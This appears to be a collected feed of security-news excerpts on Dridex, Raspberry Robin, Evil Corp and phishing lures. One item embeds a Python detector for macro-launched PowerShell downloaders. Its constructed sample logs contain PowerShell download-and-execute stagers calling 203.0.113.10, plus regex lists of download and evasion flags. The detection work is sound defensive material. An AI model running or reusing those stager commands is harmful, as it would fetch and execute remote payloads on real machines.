Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations, coupled with IBM Security X-Force malware research, shed additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure […]

The post Raspberry Robin and Dridex: Two Birds of a Feather appeared first on Security Intelligence.


Evil Corp affiliates are using off-the-shelf ransomware to evade sanctions

Researchers found a number of similarities between Evil Corp and a new group of attackers.

The post Evil Corp affiliates are using off-the-shelf ransomware to evade sanctions appeared first on CyberScoop.


Attackers used Dridex to deliver Entropy ransomware, code resemblance uncovered

Sophos released research that details code similarities between the general-purpose Dridex botnet and the little-known ransomware Entropy. The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designe…

Fake Christmas Eve termination notices used as phishing lures

A phishing campaign using a well-known malware family is employing a pair of particularly devious methods to trick targets into opening an infected file: fake employee termination notices and phony omicron-variant exposure warnings. A threat researcher going by the name of “TheAnalyst” posted a screenshot of the fake employment termination notice on Dec. 22, attributing it to a Dridex affiliate. The suspicious email told the target that their employment would cease as of Dec. 24, and that the decision was not reversible. An attached password-protected Excel file promised additional details. Once a recipient opened the file, a blurred form appeared with a button to “Enable Content,” which allowed the file to run an automated script through its macros feature, a technique intended for automation that has simultaneously been abused for years for malicious purposes. After the button was clicked, a pop-up window appeared: “Merry X-Mas Dear Employees!” Dridex is a […]

The post Fake Christmas Eve termination notices used as phishing lures appeared first on CyberScoop.


Ransomware Gangs and the Name Game Distraction

It’s nice when ransomware gangs have their bitcoin stolen, malware servers shut down, or are otherwise forced to disband. We hang on to these occasional victories because history tells us that most ransomware moneymaking collectives don’t go away so much as reinvent themselves under a new name, with new rules, targets and weaponry. Indeed, some of the most destructive and costly ransomware groups are now in their third incarnation over as many years.

Reinvention is a basic survival skill in the cybercrime business. Among the oldest tricks in the book is to fake one’s demise or retirement and invent a new identity. A key goal of such subterfuge is to throw investigators off the scent or to temporarily direct their attention elsewhere.

Cybercriminal syndicates also perform similar disappearing acts whenever it suits them. These organizational reboots are an opportunity for ransomware program leaders to set new ground rules for their members — such as which types of victims aren’t allowed (e.g., hospitals, governments, critical infrastructure), or how much of a ransom payment an affiliate should expect for bringing the group access to a new victim network.

Hackers are using CAPTCHA techniques to scam email users

More email users fell for scams using CAPTCHA technology in 2020, a new report from security firm Proofpoint shows. The technique, which uses a visual puzzle to help authenticate human behavior, received 50 times as many clicks in 2020 compared to 2019. That’s still only a 5% overall response rate, researchers note. Comparatively, one in five users clicked attachment-based emails with malware disguised as Microsoft PowerPoints or Excel spreadsheets. Campaigns using attachments to hide malware made up one in four of the attacks researchers at Proofpoint monitored. “Attackers don’t hack in, they log in, and people continue to be the most critical factor in today’s cyber attacks,” Ryan Kalember, executive vice president of cybersecurity strategy at Proofpoint said in a statement. Researchers found that quantity continues to beat quality in email attacks. Proofpoint found that the highest number of clicks came from a threat actor linked to the Emotet botnet. […]

The post Hackers are using CAPTCHA techniques to scam email users appeared first on CyberScoop.


Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts

IBM X-Force threat intelligence has been observing a rise in Dridex-related network attacks that are being driven by the Cutwail botnet. Dridex is delivered as a second-stage infector after an initial document or spreadsheet arrives via email with booby-trapped macros. Recipients who activate the macros unknowingly launch malicious PowerShell scripts that will download additional malware. […]
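
The delivery chain described here and in the Christmas-lure item above (Office document with macros, “Enable Content”, a PowerShell stager, a download of the second stage) leaves a distinctive trace in endpoint telemetry: an Office process spawning a script host. The following is an added example, not code from the original posts or from IBM or CyberScoop, of detection logic that runs over Sysmon Event ID 1-style process-creation records and flags that parent/child pair, scoring it higher when the command line carries download or evasion indicators (including inside a base64 `-EncodedCommand`). The sample events, the 203.0.113.10 address, file names and user name are all constructed for the example, and the indicator list is illustrative rather than exhaustive.

```python
"""Flag the Office macro -> script host -> download chain in process-creation logs.

Added example: sample events below are constructed (RFC 5737 address 203.0.113.10,
invented paths and user), not real captures.
"""
import base64
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Office hosts that have no legitimate reason to launch a script interpreter.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters / LOLBins a malicious macro typically shells out to.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line indicators seen in macro-launched PowerShell downloaders (illustrative list).
INDICATORS = {
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                           r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b"),
    "encoded_command": re.compile(r"(?i)\s-e(c|nc|ncodedcommand)?\s"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(p|x|xecutionpolicy)\s+bypass|-nop\b|-noprofile\b"),
    "url": re.compile(r"(?i)https?://"),
}


@dataclass
class Alert:
    severity: str
    rule: str
    parent: str
    image: str
    indicators: List[str]
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon logs full image paths)."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, if any."""
    m = re.search(r"(?i)\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # not really base64 / not UTF-16
        return None


def analyze_event(event: dict) -> Optional[Alert]:
    """Alert when an Office process spawns a script host; score by command-line content."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or image not in SCRIPT_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "")
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded:  # look through the base64 wrapper for the same indicators
        hits |= {"decoded_" + name for name, rx in INDICATORS.items()
                 if name != "encoded_command" and rx.search(decoded)}
    fetches = {"download", "decoded_download", "url", "decoded_url"}
    severity = "high" if hits & fetches else "medium"
    return Alert(severity, "office_spawns_script_host", parent, image, sorted(hits), cmdline)


def analyze_log(lines: Iterable[str]) -> List[Alert]:
    """Run analyze_event over JSON-lines process-creation records."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = analyze_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry. The encoded stager is built here so the sample is exact.
PLAIN_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED_COMMAND = base64.b64encode(PLAIN_COMMAND.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"UtcTime": "2021-12-22 14:03:11", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_COMMAND}"},
    {"UtcTime": "2021-12-22 14:05:40", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -ep bypass (New-Object Net.WebClient)"
                    r".DownloadFile('http://203.0.113.10/x.dll','%TEMP%\x.dll')"},
    {"UtcTime": "2021-12-22 14:06:02", "User": "CORP\\jdoe",   # benign: user opens a sheet
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\jdoe\Downloads\budget.xlsx'},
    {"UtcTime": "2021-12-22 14:07:15", "User": "CORP\\admin",  # benign: interactive admin shell
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
    {"UtcTime": "2021-12-22 14:08:30", "User": "CORP\\jdoe",   # benign: Word printing helper
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe"},
    {"UtcTime": "2021-12-22 14:09:12", "User": "CORP\\jdoe",   # suspicious pair, no download hint
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\jdoe\AppData\Local\Temp\update.vbs"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for a in analyze_log(SAMPLE_LOG):
        print(a.severity, a.rule, a.parent, "->", a.image, a.indicators)
```

The parent/child rule fires on its own (the wscript.exe case stays medium), because the download indicators are the easiest part for an attacker to rewrite; decoding `-enc` matters because the raw command line of the first event shows nothing about WebClient or the URL. In production the same logic maps onto a SIEM query over `ParentImage`/`Image`/`CommandLine`, with allow-list entries for add-ins that legitimately spawn cmd.exe.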

The post Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts appeared first on Security Intelligence.


Email scam aims to drop Dridex on machines by impersonating FedEx, UPS

As more Americans rely on package deliveries during the coronavirus pandemic, scammers are trying to capitalize on the tracking process by sending spoofed emails containing malicious software. Hackers are sending spoofed emails that appear to be from FedEx, UPS and DHL as part of a mass emailing campaign meant to infect victims’ computers, according to research initially published on May 5 by the security vendor Votiro. The messages appear to include package tracking updates, though at least some of them aim to infect recipients with a strain of malware known as Dridex, which is typically used to steal bank account data. The messages usually ask recipients to download an invoice, or view their tracking information. Code in the images, links and header of the email all appeared to be legitimate, providing the hackers with cover. They also disguised many of the messages to make them appear as if they arrived […]

The post Email scam aims to drop Dridex on machines by impersonating FedEx, UPS appeared first on CyberScoop.
